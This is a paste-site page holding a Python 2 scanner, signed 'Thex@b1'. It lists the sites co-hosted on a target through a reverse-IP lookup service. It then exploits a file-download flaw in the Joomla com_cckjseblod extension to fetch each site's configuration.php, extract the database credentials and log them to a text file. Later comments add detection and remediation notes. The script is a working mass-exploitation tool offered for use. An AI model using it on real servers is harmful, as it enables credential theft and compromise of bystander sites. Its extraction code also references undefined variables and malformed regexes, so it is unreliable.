
Script Vulnerability (com_cckjseblod)/ Scan Server /

a guest
Dec 1st, 2015
Python 2.84 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. import urllib,urllib2,os,sys,re
  4. import json
  5. import urlparse
  6.  
  7.  
# Base name of this script as invoked: everything after the last path
# separator, where the separator is a backslash on Windows and a slash elsewhere.
filename = sys.argv[0].rsplit('\\' if os.name == 'nt' else '/', 1)[-1]
  9.  
def usage() :
    """Print the one-line usage banner, filled in with this script's file name."""
    banner = ' Coded By Thex@b1 (Usage : %s < ip | hostname | url >)' % filename
    print(banner)
  12.      
def getdata(remoteaddr) :
    """Look up the sites hosted on ``remoteaddr`` via a third-party service.

    Sends a form-encoded POST to the yougetsignal ``domains.php`` endpoint
    over plain HTTP, with headers that present the request as a Firefox
    XMLHttpRequest coming from the service's own web page. The address being
    looked up is therefore disclosed to that service and to anyone on path.

    Returns the decoded JSON response. On any exception the error is printed
    and the process exits with status 0.
    """
    endpoint = 'http://domains.yougetsignal.com/domains.php'
    # Sent in this order; values are fixed strings, not derived from the host.
    browser_headers = (
        ('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0'),
        ('X-Requested-With', 'XMLHttpRequest'),
        ('X-Prototype-Version', '1.6.0'),
        ('Referer', 'http://www.yougetsignal.com/tools/web-sites-on-web-server/'),
        ('Origin', 'http://www.yougetsignal.com'),
    )
    try:
        request = urllib2.Request(endpoint)
        for header_name, header_value in browser_headers:
            request.add_header(header_name, header_value)

        # Passing a body to urlopen() turns the request into a POST.
        form_body = urllib.urlencode({"Key":"","remoteAddress": remoteaddr})
        raw_reply = urllib2.urlopen(request, form_body).read()
        return json.loads(raw_reply)
    except Exception as exp:
        # Network, HTTP and JSON errors all end the run here; exit status is 0.
        print(exp)
        sys.exit(0)
  33.          
def getdomains(data) :
    """Return the host names listed in a lookup response.

    ``data`` is the decoded JSON returned by ``getdata``. When its ``status``
    is ``'Success'`` the first element of every ``domainArray`` pair is
    collected; any other status yields an empty list. Any exception (missing
    key, malformed entry) is printed and the process exits with status 0.
    """
    try:
        if data['status'] != 'Success':
            return []
        # Each entry is unpacked as a pair; only the first element is kept.
        return [hostname for hostname, _info in data['domainArray']]
    except Exception as ex:
        print(ex)
        sys.exit(0)
  48.  
def main() :
    """Probe every site co-hosted with the given address for an exposed Joomla config.

    Takes exactly one command-line argument (IP, host name or URL), resolves
    the co-hosted domains through getdata()/getdomains(), and requests the
    com_cckjseblod ``download`` task for ``configuration.php`` on each one.

    Defender notes: the query string
    ``option=com_cckjseblod&task=download&file=configuration.php`` is what this
    scan leaves in web server access logs, so it is a usable detection
    signature. A response containing ``JConfig`` means the site served its
    Joomla configuration file; the database credentials in it should then be
    treated as disclosed and rotated.
    """
    # Exactly one argument is required; anything else prints usage and exits 0.
    if len(sys.argv) != 2 :
        usage()
        sys.exit(0)

    ip = sys.argv[1]
    # A full URL is reduced to its host name before the lookup.
    if ip.startswith('http://') or ip.startswith('https://') :
        parsedurl = urlparse.urlparse(ip)
        ip = parsedurl.hostname

    data = getdata(ip)
    # The lookup service reports its own failures through status/message.
    if data['status'] == 'Fail' :
        print '[-] '+data['message']
        sys.exit(0)
    for url in getdomains(data) :
     try:
       # Plain-HTTP GET with no timeout argument; the full response body is read.
       uop = urllib2.urlopen('http://'+url+'/index.php?option=com_cckjseblod&task=download&file=configuration.php').read()
       print 'testing'+ url
       # The literal "JConfig" in the body is the only indicator checked.
       if "JConfig" in uop:
            print "[+][vuln] ==========>"+url+"/index.php?option=com_cckjseblod&task=download&file=configuration.php"
            # Attempts to pull database settings out of the response with
            # regexes, print them, and append them in cleartext to joomla.txt.
            # Any failure in this block falls through to the except clause below.
            user = re.search("\('$user',*'(.*?)' *\)",uop).group(1)
            print '[+] DB_user' +user
            pwd = re.search("\('$password', *'(.*?)' *\)",read).group(1)
            print '[+] DB_PASSWORD :'+pwd
            host = re.search("\('$db', *'(.*?)' *\)",read).group(1)
            print '[+] DB_HOST :'+host
            # Opened in append mode and never explicitly closed.
            w = open('joomla.txt','a')
            w.write("http://"+site+"\nDB_USER:"+user+"\nDB_PASSWORD :"+pwd+"\nDB_HOST :"+host+"\n")
       else :
            print "not vuln"
     except Exception as ex:
            # Every exception (connection error, HTTP error, or a failure while
            # handling a positive response) is reported as "not vuln", so this
            # line is not evidence that a host is unaffected.
            print url+" not vuln"
  81.        
  82.            
  83.        
# Run the scan only when executed as a script, not when imported.
if __name__ == '__main__':
    main()